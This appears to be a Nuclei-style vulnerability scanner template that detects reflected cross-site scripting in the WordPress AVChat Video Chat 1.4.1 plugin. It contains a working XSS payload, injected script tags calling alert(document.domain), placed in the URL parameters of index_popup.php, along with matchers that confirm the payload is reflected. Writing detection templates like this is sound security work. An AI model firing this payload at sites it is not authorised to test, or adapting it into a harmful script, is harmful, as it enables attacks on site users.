id: avchat-video-chat-xss

info:
  name: WordPress AVChat Video Chat 1.4.1 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress AVChat Video Chat 1.4.1 is vulnerable to reflected cross-site scripting via index_popup.php and multiple parameters.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
    - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,,wp,wpscan,wordpress,wp-plugin


requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="FB_appId"><script>alert(document.domain)</script>"'

      - type: word
        words:
          - 'text/html'
        part: header

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07
